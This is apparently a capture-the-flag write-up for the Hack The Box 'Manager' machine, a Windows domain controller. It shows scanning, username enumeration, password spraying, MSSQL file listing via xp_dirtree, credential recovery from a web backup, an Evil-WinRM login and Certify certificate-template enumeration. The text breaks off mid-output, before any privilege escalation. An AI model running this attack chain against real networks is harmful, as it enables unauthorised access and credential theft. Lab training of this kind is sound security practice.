Manager-HTB writeup

H1u2d3a4
Nov 3

Let's start by adding the provided IP to our hosts file:

echo "10.10.11.236 manager.htb" | tee -a /etc/hosts

Enumeration

nmap -sC -sV -A 10.10.11.236

rustscan -a 10.10.11.236
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3268
Open 10.10.11.236:3269
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49687
Open 10.10.11.236:49688
Open 10.10.11.236:49689
Open 10.10.11.236:49726
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-03 02:39 EDT
Initiating Ping Scan at 02:39
Scanning 10.10.11.236 [4 ports]
Completed Ping Scan at 02:39, 2.65s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 02:39
Scanning manager.htb (10.10.11.236) [20 ports]
Discovered open port 445/tcp on 10.10.11.236
Discovered open port 53/tcp on 10.10.11.236
Discovered open port 80/tcp on 10.10.11.236
Discovered open port 135/tcp on 10.10.11.236
Discovered open port 3269/tcp on 10.10.11.236
Discovered open port 88/tcp on 10.10.11.236
Discovered open port 139/tcp on 10.10.11.236
Discovered open port 49687/tcp on 10.10.11.236
Discovered open port 389/tcp on 10.10.11.236
Discovered open port 9389/tcp on 10.10.11.236
Discovered open port 636/tcp on 10.10.11.236
Discovered open port 49689/tcp on 10.10.11.236
Discovered open port 49726/tcp on 10.10.11.236
Discovered open port 49688/tcp on 10.10.11.236
Discovered open port 49667/tcp on 10.10.11.236
Discovered open port 3268/tcp on 10.10.11.236
Discovered open port 1433/tcp on 10.10.11.236
Discovered open port 464/tcp on 10.10.11.236
Discovered open port 5985/tcp on 10.10.11.236
Discovered open port 593/tcp on 10.10.11.236
Completed SYN Stealth Scan at 02:40, 3.47s elapsed (20 total ports)
Nmap scan report for manager.htb (10.10.11.236)
Host is up, received echo-reply ttl 127 (0.50s latency).
Scanned at 2023-11-03 02:39:58 EDT for 3s

PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49687/tcp open unknown syn-ack ttl 127
49688/tcp open unknown syn-ack ttl 127
49689/tcp open unknown syn-ack ttl 127
49726/tcp open unknown syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.23 seconds
Raw packets sent: 30 (1.272KB) | Rcvd: 23 (980B)

We've observed multiple open ports on the target, with SMB, LDAP, a web server and MSSQL catching our attention. The combination of DNS (53), Kerberos (88), LDAP/LDAPS (389, 636) and the global catalog ports (3268, 3269) also tells us the host is a domain controller. To start our investigation, we'll begin by enumerating valid domain user accounts.

Before we dive into the enumeration process, make sure you have Kerbrute installed and a copy of the 'Usernames' wordlists from the SecLists repository.

Use the command below to enumerate valid domain usernames:

kerbrute userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236

It will take quite some time to run through the whole wordlist. The valid users it found:

ryan
cheng
raven
guest
administrator
operator
jinwoo
zhong
chinhaw

With our list of usernames in hand, it’s time to perform password spraying. We can use CrackMapExec for this task and execute the following command.

crackmapexec smb manager.htb -u users -p passwords
SMB 10.10.11.236 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:operator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:chinhaw STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\operator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator

Through this we discovered that the user 'operator' has the password 'operator' and can authenticate to SMB. Alternatively, the password could simply have been guessed, since it is the same as the username.

To connect to the MSSQL server using the ‘operator’ credentials through Impacket’s mssqlclient, you can use the following command:

/opt/impacket/examples/mssqlclient.py -port 1433 manager.htb/operator:operator@10.10.11.236 -windows-auth

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT CURRENT_USER;

--------------------------------------------------------------------------------------------------------------------------------

guest

SQL> SELECT SUSER_SNAME();

--------------------------------------------------------------------------------------------------------------------------------

MANAGER\Operator

SQL>

After successfully gaining access, we began to investigate the contents of the database tables, but didn't discover any valuable information. Note that CURRENT_USER returned 'guest': the Windows login is mapped only to the guest database user, so it has no rights worth speaking of on the tables. After some research, I came across an interesting article about MSSQL. Following its guidance, I executed the xp_dirtree extended stored procedure, which lists the contents of a directory on the host file system and is executable by members of the public role by default, even for a login as unprivileged as this one. The directory I chose, 'C:\inetpub\wwwroot', is the default IIS web root on Windows servers.

SQL> EXEc xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory                       depth   file
--------------------------------   -----   ----
about.html                           1      1
contact.html                         1      1
css                                  1      0
images                               1      0
index.html                           1      1
js                                   1      0
service.html                         1      1
web.config                           1      1
website-backup-27-07-23-old.zip      1      1

SQL>

Since that directory is the web root, the backup 'website-backup-27-07-23-old.zip' can be downloaded directly over HTTP:

wget 10.10.11.236/website-backup-27-07-23-old.zip
--2023-11-03 04:28:30-- http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip 100%[========================================================================================================================================>] 1021K 168KB/s in 9.3s

2023-11-03 04:28:40 (109 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

After extracting the contents from the zip file, you should be able to access the ‘old-conf.xml’ file. Inside this file, you will discover the credentials for ‘raven’.

Gaining User Access:

We proceeded by connecting through Evil-WinRM with a simple command, and in no time we obtained the user flag.

evil-winrm -i 10.10.11.236 -u raven -p '******************'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../
*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls


Directory: C:\Users\Raven\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/3/2023 5:51 AM 174080 certify.exe
-ar--- 11/3/2023 5:32 AM 34 user.txt


*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
7f5959afdb.......11235559612c09a
*Evil-WinRM* PS C:\Users\Raven\Desktop

I noticed a file called 'certify.exe' on the desktop. Certify is a tool for enumerating Active Directory Certificate Services (AD CS) and is not something you typically find on a user's desktop, so it raised a red flag for me. This piqued my curiosity, and I suspected the intended path had something to do with certificates or privileged operations.

I started by checking whether any certificate templates were vulnerable.

*Evil-WinRM* PS C:\Users\Raven\Desktop> ./Certify.exe find /vulnarable

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

Enterprise CA Name : manager-DC01-CA
DNS Hostname : dc01.manager.htb
FullName : dc01.manager.htb\manager-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial : 5150CE6EC048749448C7390A52F264BB
Cert Start Date : 7/27/2023 3:21:05 AM
Cert End Date : 7/27/2122 3:31:04 AM
Cert Chain : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Deny ManageCA, Read MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Allow ManageCA, Enroll MANAGER\Raven S-1-5-21-4078382237-1492182817-2568127209-1116
Allow Enroll MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Computers S-1-5-21-4078382237-1492182817-2568127209-515
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519

CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
